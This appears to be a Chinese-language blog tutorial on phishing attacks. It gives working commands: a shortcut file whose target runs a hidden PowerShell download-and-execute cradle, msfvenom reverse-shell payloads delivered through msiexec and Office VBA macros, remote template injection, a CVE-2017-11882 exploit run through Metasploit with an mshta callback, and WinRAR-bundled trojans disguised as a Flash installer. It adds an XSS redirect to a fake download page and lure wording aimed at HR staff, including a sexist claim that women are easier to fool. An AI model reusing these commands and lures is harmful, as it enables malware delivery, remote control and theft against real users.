lik
link文件,即快捷方式
比如一个txt文件,我们创建一个它的快捷方式,然后修改它的目标地址:
这时可以看到它的ico图标被修改了,我们可以直接修改它的图标为txt类型的ico
但是⽤系统⾃带的ico去做⽂件图标替换的话,有个弊端,即当替换的ico在⽬标机器上不存在时,就会出现类似空⽩ico图标
在实施钓⻥过程中,我们可以在"⽬标"栏写⼊⾃⼰的恶意命令,如powershell上线命令:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.107.129:8006/a'))"
也可以使用msiexec.exe,系统进程,是Windows Installer的一部分,利用此进程来加载我们shellcode可以达到一定的规避作用。
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f msi > shell.txt
c:\windows\system32\msiexec.exe /q /i http://xxx/shell.txt
Office钓鱼:
漏洞环境及利用工具:
1、Windows Server 2012 R2 x64
2、Office 2016
3、msf
4、CobaltStrike
基础了解:
宏是Office自带的一种高级脚本特性,通过VBA代码,可以在Office中去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。而宏病毒是一种寄存在文档或模板的宏中的计算机病毒。一旦打开这样的文档,其中的宏就会被执行,于是宏病毒就会被激活,转移到计算机上,并驻留在Normal模板上
Visual Basic for Applications(VBA)是Visual Basic的一种宏语言,是微软开发出来在其桌面应用程序中执行通用的自动化(OLE)任务的编程语言。主要能用来扩展Windows的应用程序功能,特别是Microsoft Office软件,也可说是一种应用程式视觉化的Basic 脚本。
常用的套路使对方开启宏:
- 文档是被保护状态,需要启用宏才能查看;
- 添加一张模糊的图片,提示需要启用宏才能查看高清图片;
- 提示要查看文档,按给出的一系列步骤操作;
- 贴一张某杀毒软件的Logo图片,暗示文档被安全软件保护。
利用过程:
1、CobaltStrike生成宏、msf生成宏:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.129 lport=6688 -f vba -o shellcode.txt
2、打开Word文档,点击 "Word 选项 — 自定义功能区 — 开发者工具(勾选) — 确定"
3、点击 “开发工具 — Visual Basic”,双击 “ThisDocument” ,将原有内容全部清空,然后将CobaltStrike生成宏payload全部粘贴进去,保存并关闭该 VBA 编辑器
4、另存为的Word类型务必要选”Word 97-2003 文档 (*.doc)”,即 doc 文件,保证低版本可以打开。之后关闭,再打开即可执行宏代码
默认情况下,Office已经禁用所有宏,在打开Word文档的时候发出通知。这是如果目标选择启用宏,CobaltStrike的Beacon就会上线
不足:宏代码是存在本地的,极易被杀软查杀
word插入外部对象:
这里可以修改成doc图标,改变题注,更加逼真。双击,选择确定,即可上线。
远程模板注入宏代码:
利用原理:
利用Word文档加载附加模板时的缺陷所发起的恶意请求而达到的攻击目的,所以当目标用户点开攻击者发给他的恶意word文档就可以通过向远程服务器发送恶意请求的方式,然后加载模板执行恶意模板的宏
发送的文档本身是不带恶意代码的,能过很多静态的检测。只需要在远程DOTM文档中编写宏病毒或者宏木马即可完成攻击
利用过程:
1、编写一个带有宏代码的DOTM文档,上传服务器
2、编写一个能够远程连接的DOCX文档:
这里我们直接在网上找简历模板文件:
注意:不要编写纯文本的文档
将我们下载的docx文档压缩成zip格式,并解压查看其目录结构
右键选择"编辑",可以看到如下所示内容,其中,Target所指的路径即我们要修改的位置
将其修改为我们dotm文件所在的url
将其中所有目录及文件选中,点击右键压缩,选中压缩文件格式为zip
然后将其后缀名修改为docx,再将其打开
选择启用宏以后,远程服务器的模板成功加载:
CS成功上线:
CVE-2017-11882:
利用范围:
Office 2003到2016的所有版本
项目地址:https://github.com/Ridter/CVE-2017-11882
漏洞检验:
我们可以先弹出个计算器,测试是否存在漏洞:
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc
将生成的test.doc上传到目标主机,打开并观察是否存在漏洞
通过msf利用漏洞:
项目地址:https://github.com/0x09AL/CVE-2017-11882-metasploit
cp cve_2017_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/local/
cp cve-2017-11882.rtf /usr/share/metasploit-framework/data/exploits/
# 打开msf,重新加载模块
reload_all
search cve_2017_11882
use exploit/windows/local/cve_2017_11882
set payload windows/meterpreter/reverse_tcp
set uripath test
set lhost 192.168.107.129
set lport 7777
exploit -j
另外打开一个终端,执行如下命令,生成恶意doc文件
python Command_CVE-2017-11882.py -c "mshta http://192.168.107.129:8080/test" -o test2.doc
将恶意doc文件上传到目标服务器并打开,成功上线:
那么现在的问题就是如何诱导用户点击运行宏呢?
试想以下场景:
通过简历投递发送给HR进行钓鱼,而HR大多数是女生,女生比较善良、不设防,又非技术人员,绝对是属于安全意识最薄弱的人之一
尝试手段:
简历背景为一个虚化的简历图片,然后在上方加入一段文字,告诉受害者:之所以简历看不清楚是因为你没有点击宏运行,要想看清,请点击运行宏
如下图所示:(图片来源于红蓝对抗之邮件钓鱼攻击)
个人感觉还有很多话术待学习,真想找人试验一下~(提高HR的防钓鱼安全意识)
自解压捆绑文件的利用:
这里我们以flash钓鱼为例:
前期准备:
1、免杀马
2、域名注册
3、vps服务器
flash官网的钓鱼源码:
https://github.com/r00tSe7en/Fake-flash.cn
利用过程:
利用winrar实现捆绑:
1.准备好的木马和官网的flash安装程序
2.鼠标右键,添加到压缩文件。
3.选择"创建自解压格式压缩文件"
4.点击高级,选择"自解压选项"
5.解压路径为:C:\windows\temp
6.点击设置,提取后运行处填写:flash.exe、flashplayer_install_cn.exe
7.点击模式,选择"全部隐藏"
8.点击更新,选择"解压并更新文件"以及"覆盖所有文件"
9.点击确定,返回后修改压缩文件名,尽量逼真一些
使用ResourceHacker修改图标:
1.通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。
2.再利用ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存
最后实现的效果如图所示:
打开flash安装程序以后,木马已悄然上线~
上传fake网站的源码和刚刚做的捆绑木马至服务器,开放Web服务
利用XSS弹框提示钓鱼:
window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="http://x.x.x.x";
实现效果:
点击"确定"后,即跳转到精心伪造的Flash下载页面:
参考如下:
红蓝对抗之邮件钓鱼攻击
Office宏的基本利用
利用DOCX文档远程模板注入执行宏代码
Office钓鱼之传世经典CVE-2017-11882分析学习
Flash水坑钓鱼
网友评论